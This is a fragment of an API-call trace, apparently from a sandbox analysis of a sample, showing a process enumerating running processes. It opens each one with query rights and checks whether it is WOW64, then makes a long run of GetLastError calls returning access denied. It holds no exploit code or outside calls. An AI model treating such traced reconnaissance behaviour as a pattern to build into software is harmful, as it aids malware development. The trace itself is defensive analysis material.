	[0075.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.096] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.096] CloseHandle (hObject=0x224) returned 1
	[0075.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.097] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.097] CloseHandle (hObject=0x224) returned 1
	[0075.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.097] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.098] CloseHandle (hObject=0x224) returned 1
	[0075.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.098] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.098] CloseHandle (hObject=0x224) returned 1
	[0075.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.098] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.099] CloseHandle (hObject=0x224) returned 1
	[0075.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.099] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.099] CloseHandle (hObject=0x224) returned 1
	[0075.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.099] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.099] CloseHandle (hObject=0x224) returned 1
	[0075.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.099] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.100] CloseHandle (hObject=0x224) returned 1
	[0075.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.101] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.101] CloseHandle (hObject=0x224) returned 1
	[0075.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.101] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.101] CloseHandle (hObject=0x224) returned 1
	[0075.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.101] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.102] CloseHandle (hObject=0x224) returned 1
	[0075.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.102] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.102] CloseHandle (hObject=0x224) returned 1
	[0075.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.102] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.102] CloseHandle (hObject=0x224) returned 1
	[0075.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.102] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.102] CloseHandle (hObject=0x224) returned 1
	[0075.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a98, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.103] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.103] CloseHandle (hObject=0x224) returned 1
	[0075.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.103] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.103] CloseHandle (hObject=0x224) returned 1
	[0075.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.104] CloseHandle (hObject=0x224) returned 1
	[0075.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.104] CloseHandle (hObject=0x224) returned 1
	[0075.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.105] CloseHandle (hObject=0x224) returned 1
	[0075.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.105] CloseHandle (hObject=0x224) returned 1
	[0075.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.105] CloseHandle (hObject=0x224) returned 1
	[0075.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.106] CloseHandle (hObject=0x224) returned 1
	[0075.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.106] CloseHandle (hObject=0x224) returned 1
	[0075.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e8b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.107] CloseHandle (hObject=0x224) returned 1
	[0075.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.107] CloseHandle (hObject=0x224) returned 1
	[0075.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.108] CloseHandle (hObject=0x224) returned 1
	[0075.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.108] CloseHandle (hObject=0x224) returned 1
	[0075.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.109] CloseHandle (hObject=0x224) returned 1
	[0075.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728838, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.109] CloseHandle (hObject=0x224) returned 1
	[0075.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb08, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.110] CloseHandle (hObject=0x224) returned 1
	[0075.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.110] CloseHandle (hObject=0x224) returned 1
	[0075.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.111] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.112] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
	[0075.113] GetLastError () returned 0x5
